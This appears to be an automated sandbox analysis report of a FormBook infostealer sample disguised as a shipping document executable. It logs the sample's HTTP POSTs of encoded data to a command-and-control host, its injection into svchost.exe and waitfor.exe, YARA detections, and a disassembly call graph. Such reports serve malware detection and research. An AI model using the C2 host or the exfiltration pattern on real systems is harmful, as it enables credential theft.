                                                                                  Data Raw: 4c 44 56 6c 43 7a 3d 35 31 35 55 38 36 59 2f 69 6e 74 74 38 71 31 72 54 58 57 31 4f 6b 63 73 5a 45 57 38 74 70 30 67 77 66 79 34 47 4f 49 44 4f 39 42 56 50 44 48 4a 4b 4f 53 44 52 4f 4e 77 74 41 53 64 65 59 75 61 56 69 44 61 30 2b 78 42 6b 42 70 53 4c 67 65 66 4f 71 51 4b 4a 6f 55 6c 42 49 61 74 4f 37 78 38 77 79 39 71 65 69 32 47 4e 71 52 68 39 5a 5a 66 64 64 47 4d 4d 4c 43 52 69 6c 50 39 67 4d 2f 4b 79 7a 32 72 45 78 35 33 6a 36 6d 4a 62 6f 6c 64 6d 57 61 64 66 30 31 53 6b 55 45 53 75 4f 7a 57 45 42 76 4d 64 47 33 66 4b 65 48 77 4e 6c 78 70 36 6a 53 51 4e 41 38 57 38 39 72 4e 68 66 67 38 2b 6f 45 77 41 67 63 3d
                                                                                  Data Ascii: LDVlCz=515U86Y/intt8q1rTXW1OkcsZEW8tp0gwfy4GOIDO9BVPDHJKOSDRONwtASdeYuaViDa0+xBkBpSLgefOqQKJoUlBIatO7x8wy9qei2GNqRh9ZZfddGMMLCRilP9gM/Kyz2rEx53j6mJboldmWadf01SkUESuOzWEBvMdG3fKeHwNlxp6jSQNA8W89rNhfg8+oEwAgc=


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  42192.168.2.550018172.67.176.240805884C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 12, 2024 00:21:25.298693895 CET790OUTPOST /26nq/ HTTP/1.1
                                                                                  Host: www.zrichiod-riech.sbs
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.zrichiod-riech.sbs
                                                                                  Referer: http://www.zrichiod-riech.sbs/26nq/
                                                                                  Content-Length: 227
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
                                                                                  Data Raw: 4c 44 56 6c 43 7a 3d 35 31 35 55 38 36 59 2f 69 6e 74 74 36 4f 78 72 52 30 4f 31 43 55 63 76 54 6b 57 38 6e 4a 30 38 77 66 75 34 47 4d 6c 65 4f 4c 35 56 49 69 33 4a 4a 4b 47 44 57 4f 4e 77 6d 67 53 59 42 49 75 56 56 69 2b 77 30 38 56 42 6b 42 39 53 4c 67 75 66 4f 35 49 4e 47 59 55 64 55 59 61 56 54 4c 78 38 77 79 39 71 65 69 6a 68 4e 75 39 68 39 6f 70 66 53 66 69 44 46 72 43 53 6c 6c 50 39 32 4d 2f 4f 79 7a 32 4e 45 77 56 52 6a 34 65 4a 62 74 42 64 6c 48 61 61 47 45 31 55 37 6b 46 6d 6f 72 53 79 45 79 7a 47 61 6b 43 39 66 59 54 4f 4d 54 41 44 67 42 61 34 65 67 51 75 73 75 6a 36 77 76 42 56 6b 4c 55 41 65 33 4c 56 77 35 6a 33 59 4f 57 73 4a 69 6c 4f 38 75 49 78 67 78 59 6c
                                                                                  Data Ascii: LDVlCz=515U86Y/intt6OxrR0O1CUcvTkW8nJ08wfu4GMleOL5VIi3JJKGDWONwmgSYBIuVVi+w08VBkB9SLgufO5INGYUdUYaVTLx8wy9qeijhNu9h9opfSfiDFrCSllP92M/Oyz2NEwVRj4eJbtBdlHaaGE1U7kFmorSyEyzGakC9fYTOMTADgBa4egQusuj6wvBVkLUAe3LVw5j3YOWsJilO8uIxgxYl


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  43192.168.2.550019172.67.176.240805884C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 12, 2024 00:21:27.953502893 CET1807OUTPOST /26nq/ HTTP/1.1
                                                                                  Host: www.zrichiod-riech.sbs
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.zrichiod-riech.sbs
                                                                                  Referer: http://www.zrichiod-riech.sbs/26nq/
                                                                                  Content-Length: 1243
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
                                                                                  Data Raw: 4c 44 56 6c 43 7a 3d 35 31 35 55 38 36 59 2f 69 6e 74 74 36 4f 78 72 52 30 4f 31 43 55 63 76 54 6b 57 38 6e 4a 30 38 77 66 75 34 47 4d 6c 65 4f 4c 78 56 49 51 2f 4a 50 64 36 44 58 4f 4e 77 36 51 53 5a 42 49 75 49 56 6d 71 72 30 38 70 72 6b 43 46 53 4b 44 6d 66 65 63 38 4e 52 49 55 64 4d 6f 61 75 4f 37 77 2b 77 7a 52 75 65 69 7a 68 4e 75 39 68 39 71 68 66 62 74 47 44 4a 4c 43 52 69 6c 50 78 67 4d 2f 32 79 7a 76 34 45 77 52 6e 6a 4a 2b 4a 62 4e 52 64 6e 30 79 61 50 45 31 57 34 6b 46 2b 6f 72 57 74 45 79 76 73 61 67 43 58 66 66 6e 4f 41 6c 45 56 30 43 61 4a 63 67 49 39 75 63 4b 57 6c 2f 4a 65 6b 4c 6f 78 63 67 76 6f 2f 36 4c 35 65 72 65 39 4c 6a 64 48 6a 4c 34 78 75 56 6c 50 39 52 67 32 4d 57 63 66 38 47 57 4e 34 4d 75 4b 78 4d 44 71 57 77 52 57 79 72 76 46 70 49 49 6b 77 41 53 72 41 72 44 6b 55 4e 59 63 62 57 31 47 73 70 5a 69 73 30 61 46 45 71 79 78 44 6d 75 30 51 62 79 6b 46 4e 53 78 36 6b 76 39 30 2b 79 6b 4b 36 50 4a 45 43 4d 68 66 71 4e 74 63 6c 79 51 6d 51 76 49 34 71 58 53 41 59 50 6d 58 61 7a [TRUNCATED]
                                                                                  Data Ascii: LDVlCz=515U86Y/intt6OxrR0O1CUcvTkW8nJ08wfu4GMleOLxVIQ/JPd6DXONw6QSZBIuIVmqr08prkCFSKDmfec8NRIUdMoauO7w+wzRueizhNu9h9qhfbtGDJLCRilPxgM/2yzv4EwRnjJ+JbNRdn0yaPE1W4kF+orWtEyvsagCXffnOAlEV0CaJcgI9ucKWl/JekLoxcgvo/6L5ere9LjdHjL4xuVlP9Rg2MWcf8GWN4MuKxMDqWwRWyrvFpIIkwASrArDkUNYcbW1GspZis0aFEqyxDmu0QbykFNSx6kv90+ykK6PJECMhfqNtclyQmQvI4qXSAYPmXazeo4Mo9zk0RluChRMTwHoKsZ6mQ7ujjpUSeXpGpBKxE9aSOWR/Kr2LhbTkthcgxP4ddtC21GcvwFJjm47gULsDVYawzrOor4sJY482pz3EiVAlhp6+xQoKPgvHs5S1XNF3sxdT++Ggb+gOr/HVpAgLGEyZV79ZY9kyy6zBo23vrB/HE8bK5q9+JpKO9PBdEV/SPSpZ0J6NdQ2Y1BrjpGb8RCbJZdEPeSosofqhhxAatlWwuVVib6RRxfkEL35MYhx0PU6MQGDTcd7K2qLoHuIzOdVBuMVxdAXT7lVnNfQoSTTG+8CZQYVTTZsOJR43pIV7ouHRXtBzPYYpU45ExHg2MlWInHoCAVS6XRXyMjT/h0G6WbnvfhmbP41ZfXnxI+ZfNY/yXTdK515mbBwR/x3BpVHXFWSVf2JemwEo2bhURCoDOESarnd5z71Bdzh6Jyfx5dTEEnyALAuTI9R3JrdCOLs8lWGOFRd5qjtq219CcXKrvLGQw9vDOC1kY/xBuubGiwGbbJVgjv6UAHQ4ets6gLl0SYuGHYmde0U3l1cqx2QiQabOj2JYOH38jilttxU5WfFqa+1asHntbDoGuH5rYHEqJAb3s3ZiuH2oxiC3hZXzb/WxKNmwDHmjBqJvLHI3B9DH3XhW4LiUU/Npl7krZ+zDo2FzBn2BX [TRUNCATED]


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  44192.168.2.550020172.67.176.240805884C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 12, 2024 00:21:30.642664909 CET509OUTGET /26nq/?LDVlCz=03R0/PY94GJRzPoOKSenb2h5QS/Kl50E/qK0YcgrJ8wpZCLSP+GtGIEwrkK3Oa2ONw/TguZq9BdWMDmUOrZ+COkHC5rjPuI42FsUNzu6Vv93haoOa+yyAoKItnrc6cGBtQ==&NdLhG=cLCtFnqPUvutTbuP HTTP/1.1
                                                                                  Host: www.zrichiod-riech.sbs
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
                                                                                  Dec 12, 2024 00:22:10.729553938 CET966INHTTP/1.1 522
                                                                                  Date: Wed, 11 Dec 2024 23:22:10 GMT
                                                                                  Content-Type: text/plain; charset=UTF-8
                                                                                  Content-Length: 15
                                                                                  Connection: close
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z%2BgNasc%2BjL9ILc7Wr45%2BfKyGWoSymvk%2BoESn7pij8v9kvzqRJ%2BPUz9h0Iob7tP7U1OmBoC4GzLxaXN1NTyfcPh7pNIKOPnca7vRhjcIMH6i6RaRsQid8ULxUxICOldPeKSw8N2%2Bg29Pl"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                  Referrer-Policy: same-origin
                                                                                  Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                  Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8f0936240f83330c-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1994&min_rtt=1994&rtt_var=997&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=509&delivery_rate=0&cwnd=188&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 32
                                                                                  Data Ascii: error code: 522


                                                                                  Statistics

                                                                                  CPU Usage

                                                                                  Click to jump to process

                                                                                  Memory Usage

                                                                                  Click to jump to process

                                                                                  High Level Behavior Distribution

                                                                                  Click to dive into process behavior distribution

                                                                                  Behavior

                                                                                  Click to jump to process

                                                                                  System Behavior

                                                                                  General

                                                                                  Target ID:0
                                                                                  Start time:18:17:54
                                                                                  Start date:11/12/2024
                                                                                  Path:C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe"
                                                                                  Imagebase:0xb50000
                                                                                  File size:1'188'352 bytes
                                                                                  MD5 hash:8A85446EBB8EB07A56672AFA7C1B7FBC
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:2
                                                                                  Start time:18:17:55
                                                                                  Start date:11/12/2024
                                                                                  Path:C:\Windows\SysWOW64\svchost.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe"
                                                                                  Imagebase:0x960000
                                                                                  File size:46'504 bytes
                                                                                  MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2248280939.00000000004B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2249418016.0000000003D50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2248660468.0000000002970000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:3
                                                                                  Start time:18:18:09
                                                                                  Start date:11/12/2024
                                                                                  Path:C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe"
                                                                                  Imagebase:0xf60000
                                                                                  File size:140'800 bytes
                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4473260603.0000000003AB0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:high
                                                                                  Has exited:false

                                                                                  General

                                                                                  Target ID:5
                                                                                  Start time:18:18:11
                                                                                  Start date:11/12/2024
                                                                                  Path:C:\Windows\SysWOW64\waitfor.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\SysWOW64\waitfor.exe"
                                                                                  Imagebase:0xc50000
                                                                                  File size:32'768 bytes
                                                                                  MD5 hash:E58E152B44F20DD099C5105DE482DF24
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4473308327.00000000048C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4473351797.0000000004910000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4472444044.0000000002C60000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:low
                                                                                  Has exited:false

                                                                                  General

                                                                                  Target ID:6
                                                                                  Start time:18:18:23
                                                                                  Start date:11/12/2024
                                                                                  Path:C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe"
                                                                                  Imagebase:0xf60000
                                                                                  File size:140'800 bytes
                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:false

                                                                                  General

                                                                                  Target ID:7
                                                                                  Start time:18:18:35
                                                                                  Start date:11/12/2024
                                                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                  Imagebase:0x7ff79f9e0000
                                                                                  File size:676'768 bytes
                                                                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Disassembly

                                                                                  Reset < >

                                                                                    Execution Graph

                                                                                    Execution Coverage:2.9%
                                                                                    Dynamic/Decrypted Code Coverage:0.5%
                                                                                    Signature Coverage:7.3%
                                                                                    Total number of Nodes:2000
                                                                                    Total number of Limit Nodes:166
                                                                                    execution_graph 104444 b51055 104449 b52649 104444->104449 104459 b57667 104449->104459 104453 b52754 104454 b5105a 104453->104454 104467 b53416 59 API calls 2 library calls 104453->104467 104456 b72d40 104454->104456 104513 b72c44 104456->104513 104458 b51064 104468 b70db6 104459->104468 104461 b57688 104462 b70db6 Mailbox 59 API calls 104461->104462 104463 b526b7 104462->104463 104464 b53582 104463->104464 104506 b535b0 104464->104506 104467->104453 104472 b70dbe 104468->104472 104470 b70dd8 104470->104461 104472->104470 104473 b70ddc std::exception::exception 104472->104473 104478 b7571c 104472->104478 104495 b733a1 DecodePointer 104472->104495 104496 b7859b RaiseException 104473->104496 104475 b70e06 104497 b784d1 58 API calls _free 104475->104497 104477 b70e18 104477->104461 104479 b75797 104478->104479 104482 b75728 104478->104482 104504 b733a1 DecodePointer 104479->104504 104481 b7579d 104505 b78b28 58 API calls __getptd_noexit 104481->104505 104485 b7575b RtlAllocateHeap 104482->104485 104487 b75733 104482->104487 104489 b75783 104482->104489 104493 b75781 104482->104493 104501 b733a1 DecodePointer 104482->104501 104485->104482 104486 b7578f 104485->104486 104486->104472 104487->104482 104498 b7a16b 58 API calls __NMSG_WRITE 104487->104498 104499 b7a1c8 58 API calls 7 library calls 104487->104499 104500 b7309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 104487->104500 104502 b78b28 58 API calls __getptd_noexit 104489->104502 104503 b78b28 58 API calls __getptd_noexit 104493->104503 104495->104472 104496->104475 104497->104477 104498->104487 104499->104487 104501->104482 104502->104493 104503->104486 104504->104481 104505->104486 104507 b535bd 104506->104507 104508 b535a1 104506->104508 104507->104508 104509 b535c4 RegOpenKeyExW 104507->104509 104508->104453 104509->104508 104510 b535de RegQueryValueExW 104509->104510 104511 b53614 RegCloseKey 104510->104511 104512 b535ff 104510->104512 104511->104508 104512->104511 104514 b72c50 type_info::_Type_info_dtor 104513->104514 104521 b73217 104514->104521 104520 b72c77 type_info::_Type_info_dtor 104520->104458 104538 b79c0b 104521->104538 104523 b72c59 104524 b72c88 DecodePointer DecodePointer 104523->104524 104525 b72c65 104524->104525 104526 b72cb5 104524->104526 104535 b72c82 104525->104535 104526->104525 104584 b787a4 59 API calls __wsplitpath_helper 104526->104584 104528 b72d18 EncodePointer EncodePointer 104528->104525 104529 b72cc7 104529->104528 104530 b72cec 104529->104530 104585 b78864 61 API calls __realloc_crt 104529->104585 104530->104525 104533 b72d06 EncodePointer 104530->104533 104586 b78864 61 API calls __realloc_crt 104530->104586 104533->104528 104534 b72d00 104534->104525 104534->104533 104587 b73220 104535->104587 104539 b79c2f EnterCriticalSection 104538->104539 104540 b79c1c 104538->104540 104539->104523 104545 b79c93 104540->104545 104542 b79c22 104542->104539 104569 b730b5 58 API calls 3 library calls 104542->104569 104546 b79c9f type_info::_Type_info_dtor 104545->104546 104547 b79cc0 104546->104547 104548 b79ca8 104546->104548 104557 b79ce1 type_info::_Type_info_dtor 104547->104557 104573 b7881d 58 API calls 2 library calls 104547->104573 104570 b7a16b 58 API calls __NMSG_WRITE 104548->104570 104551 b79cad 104571 b7a1c8 58 API calls 7 library calls 104551->104571 104552 b79cd5 104555 b79cdc 104552->104555 104556 b79ceb 104552->104556 104554 b79cb4 104572 b7309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 104554->104572 104574 b78b28 58 API calls __getptd_noexit 104555->104574 104560 b79c0b __lock 58 API calls 104556->104560 104557->104542 104562 b79cf2 104560->104562 104563 b79d17 104562->104563 104564 b79cff 104562->104564 104576 b72d55 104563->104576 104575 b79e2b InitializeCriticalSectionAndSpinCount 104564->104575 104567 b79d0b 104582 b79d33 LeaveCriticalSection _doexit 104567->104582 104570->104551 104571->104554 104573->104552 104574->104557 104575->104567 104577 b72d5e RtlFreeHeap 104576->104577 104578 b72d87 __dosmaperr 104576->104578 104577->104578 104579 b72d73 104577->104579 104578->104567 104583 b78b28 58 API calls __getptd_noexit 104579->104583 104581 b72d79 GetLastError 104581->104578 104582->104557 104583->104581 104584->104529 104585->104530 104586->104534 104590 b79d75 LeaveCriticalSection 104587->104590 104589 b72c87 104589->104520 104590->104589 104591 b77c56 104592 b77c62 type_info::_Type_info_dtor 104591->104592 104628 b79e08 GetStartupInfoW 104592->104628 104594 b77c67 104630 b78b7c GetProcessHeap 104594->104630 104596 b77cbf 104597 b77cca 104596->104597 104713 b77da6 58 API calls 3 library calls 104596->104713 104631 b79ae6 104597->104631 104600 b77cd0 104601 b77cdb __RTC_Initialize 104600->104601 104714 b77da6 58 API calls 3 library calls 104600->104714 104652 b7d5d2 104601->104652 104604 b77cea 104605 b77cf6 GetCommandLineW 104604->104605 104715 b77da6 58 API calls 3 library calls 104604->104715 104671 b84f23 GetEnvironmentStringsW 104605->104671 104608 b77cf5 104608->104605 104611 b77d10 104612 b77d1b 104611->104612 104716 b730b5 58 API calls 3 library calls 104611->104716 104681 b84d58 104612->104681 104615 b77d21 104616 b77d2c 104615->104616 104717 b730b5 58 API calls 3 library calls 104615->104717 104695 b730ef 104616->104695 104619 b77d34 104620 b77d3f __wwincmdln 104619->104620 104718 b730b5 58 API calls 3 library calls 104619->104718 104701 b547d0 104620->104701 104623 b77d53 104624 b77d62 104623->104624 104719 b73358 58 API calls _doexit 104623->104719 104720 b730e0 58 API calls _doexit 104624->104720 104627 b77d67 type_info::_Type_info_dtor 104629 b79e1e 104628->104629 104629->104594 104630->104596 104721 b73187 36 API calls 2 library calls 104631->104721 104633 b79aeb 104722 b79d3c InitializeCriticalSectionAndSpinCount __getstream 104633->104722 104635 b79af0 104636 b79af4 104635->104636 104724 b79d8a TlsAlloc 104635->104724 104723 b79b5c 61 API calls 2 library calls 104636->104723 104639 b79af9 104639->104600 104640 b79b06 104640->104636 104641 b79b11 104640->104641 104725 b787d5 104641->104725 104644 b79b53 104733 b79b5c 61 API calls 2 library calls 104644->104733 104647 b79b32 104647->104644 104649 b79b38 104647->104649 104648 b79b58 104648->104600 104732 b79a33 58 API calls 4 library calls 104649->104732 104651 b79b40 GetCurrentThreadId 104651->104600 104653 b7d5de type_info::_Type_info_dtor 104652->104653 104654 b79c0b __lock 58 API calls 104653->104654 104655 b7d5e5 104654->104655 104656 b787d5 __calloc_crt 58 API calls 104655->104656 104658 b7d5f6 104656->104658 104657 b7d661 GetStartupInfoW 104660 b7d7a5 104657->104660 104667 b7d676 104657->104667 104658->104657 104659 b7d601 type_info::_Type_info_dtor @_EH4_CallFilterFunc@8 104658->104659 104659->104604 104661 b7d86d 104660->104661 104665 b7d7f2 GetStdHandle 104660->104665 104666 b7d805 GetFileType 104660->104666 104746 b79e2b InitializeCriticalSectionAndSpinCount 104660->104746 104747 b7d87d LeaveCriticalSection _doexit 104661->104747 104663 b7d6c4 104663->104660 104668 b7d6f8 GetFileType 104663->104668 104745 b79e2b InitializeCriticalSectionAndSpinCount 104663->104745 104664 b787d5 __calloc_crt 58 API calls 104664->104667 104665->104660 104666->104660 104667->104660 104667->104663 104667->104664 104668->104663 104672 b77d06 104671->104672 104673 b84f34 104671->104673 104677 b84b1b GetModuleFileNameW 104672->104677 104673->104673 104748 b7881d 58 API calls 2 library calls 104673->104748 104675 b84f5a _memmove 104676 b84f70 FreeEnvironmentStringsW 104675->104676 104676->104672 104678 b84b4f _wparse_cmdline 104677->104678 104680 b84b8f _wparse_cmdline 104678->104680 104749 b7881d 58 API calls 2 library calls 104678->104749 104680->104611 104682 b84d71 __wsetenvp 104681->104682 104686 b84d69 104681->104686 104683 b787d5 __calloc_crt 58 API calls 104682->104683 104691 b84d9a __wsetenvp 104683->104691 104684 b84df1 104685 b72d55 _free 58 API calls 104684->104685 104685->104686 104686->104615 104687 b787d5 __calloc_crt 58 API calls 104687->104691 104688 b84e16 104689 b72d55 _free 58 API calls 104688->104689 104689->104686 104691->104684 104691->104686 104691->104687 104691->104688 104692 b84e2d 104691->104692 104750 b84607 58 API calls __wsplitpath_helper 104691->104750 104751 b78dc6 IsProcessorFeaturePresent 104692->104751 104694 b84e39 104694->104615 104696 b730fb __IsNonwritableInCurrentImage 104695->104696 104774 b7a4d1 104696->104774 104698 b73119 __initterm_e 104699 b72d40 __cinit 67 API calls 104698->104699 104700 b73138 __cinit __IsNonwritableInCurrentImage 104698->104700 104699->104700 104700->104619 104702 b54889 104701->104702 104703 b547ea 104701->104703 104702->104623 104704 b54824 IsThemeActive 104703->104704 104777 b7336c 104704->104777 104708 b54850 104789 b548fd SystemParametersInfoW SystemParametersInfoW 104708->104789 104710 b5485c 104790 b53b3a 104710->104790 104712 b54864 SystemParametersInfoW 104712->104702 104713->104597 104714->104601 104715->104608 104719->104624 104720->104627 104721->104633 104722->104635 104723->104639 104724->104640 104728 b787dc 104725->104728 104727 b78817 104727->104644 104731 b79de6 TlsSetValue 104727->104731 104728->104727 104730 b787fa 104728->104730 104734 b851f6 104728->104734 104730->104727 104730->104728 104742 b7a132 Sleep 104730->104742 104731->104647 104732->104651 104733->104648 104735 b85201 104734->104735 104739 b8521c 104734->104739 104736 b8520d 104735->104736 104735->104739 104743 b78b28 58 API calls __getptd_noexit 104736->104743 104737 b8522c HeapAlloc 104737->104739 104740 b85212 104737->104740 104739->104737 104739->104740 104744 b733a1 DecodePointer 104739->104744 104740->104728 104742->104730 104743->104740 104744->104739 104745->104663 104746->104660 104747->104659 104748->104675 104749->104680 104750->104691 104752 b78dd1 104751->104752 104757 b78c59 104752->104757 104756 b78dec 104756->104694 104758 b78c73 _memset ___raise_securityfailure 104757->104758 104759 b78c93 IsDebuggerPresent 104758->104759 104765 b7a155 SetUnhandledExceptionFilter UnhandledExceptionFilter 104759->104765 104762 b78d57 ___raise_securityfailure 104766 b7c5f6 104762->104766 104763 b78d7a 104764 b7a140 GetCurrentProcess TerminateProcess 104763->104764 104764->104756 104765->104762 104767 b7c600 IsProcessorFeaturePresent 104766->104767 104768 b7c5fe 104766->104768 104770 b8590a 104767->104770 104768->104763 104773 b858b9 5 API calls 2 library calls 104770->104773 104772 b859ed 104772->104763 104773->104772 104775 b7a4d4 EncodePointer 104774->104775 104775->104775 104776 b7a4ee 104775->104776 104776->104698 104778 b79c0b __lock 58 API calls 104777->104778 104779 b73377 DecodePointer EncodePointer 104778->104779 104842 b79d75 LeaveCriticalSection 104779->104842 104781 b54849 104782 b733d4 104781->104782 104783 b733f8 104782->104783 104784 b733de 104782->104784 104783->104708 104784->104783 104843 b78b28 58 API calls __getptd_noexit 104784->104843 104786 b733e8 104844 b78db6 9 API calls __wsplitpath_helper 104786->104844 104788 b733f3 104788->104708 104789->104710 104791 b53b47 __ftell_nolock 104790->104791 104792 b57667 59 API calls 104791->104792 104793 b53b51 GetCurrentDirectoryW 104792->104793 104845 b53766 104793->104845 104795 b53b7a IsDebuggerPresent 104796 b8d272 MessageBoxA 104795->104796 104797 b53b88 104795->104797 104799 b8d28c 104796->104799 104798 b53ba5 104797->104798 104797->104799 104828 b53c61 104797->104828 104926 b57285 104798->104926 105064 b57213 59 API calls Mailbox 104799->105064 104800 b53c68 SetCurrentDirectoryW 104803 b53c75 Mailbox 104800->104803 104803->104712 104804 b8d29c 104809 b8d2b2 SetCurrentDirectoryW 104804->104809 104806 b53bc3 GetFullPathNameW 104942 b57bcc 104806->104942 104808 b53bfe 104951 b6092d 104808->104951 104809->104803 104812 b53c1c 104813 b53c26 104812->104813 105065 ba874b AllocateAndInitializeSid CheckTokenMembership FreeSid 104812->105065 104967 b53a46 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 104813->104967 104816 b8d2cf 104816->104813 104819 b8d2e0 104816->104819 105066 b54706 104819->105066 104820 b53c30 104822 b53c43 104820->104822 104975 b5434a 104820->104975 104986 b609d0 104822->104986 104824 b8d2e8 105073 b57de1 104824->105073 104826 b53c4e 104826->104828 105063 b5443a Shell_NotifyIconW _memset 104826->105063 104828->104800 104829 b8d2f5 104831 b8d2ff 104829->104831 104832 b8d324 104829->104832 105077 b57cab 104831->105077 104834 b57cab 59 API calls 104832->104834 104836 b8d320 GetForegroundWindow ShellExecuteW 104834->104836 104840 b8d354 Mailbox 104836->104840 104840->104828 104841 b57cab 59 API calls 104841->104836 104842->104781 104843->104786 104844->104788 104846 b57667 59 API calls 104845->104846 104847 b5377c 104846->104847 105093 b53d31 104847->105093 104849 b5379a 104850 b54706 61 API calls 104849->104850 104851 b537ae 104850->104851 104852 b57de1 59 